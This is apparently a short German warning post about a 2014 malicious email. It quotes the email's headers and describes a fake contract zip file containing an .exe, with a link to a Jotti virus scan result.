Received: from KTNRON06-1279383083.sdsl.bell.ca ([76.65.214.43]) by
mx-ha.gmx.net (mxgmx001) with ESMTP (Nemesis) ID: [ID filtered]
<xxx>; Tue, 29 Apr 2014 xx:xx:xx +0200
Message-ID: [ID filtered]
Date: Tue, 29 Apr 2014 xx:xx:xx -0400
From: "Dammann Boller" <schuld [at] dwdh.de>

In der angefügten "vertrag_3417297230CC307C3.zip" befindet sich - wenig innovativ - eine "vertrag_3417297230CC307C3.exe".

Scan von Jotti: http://virusscan.jotti.org/de/scanresult/bc52b0aa1f8b3ebb3a18850ba006c05f855c6f09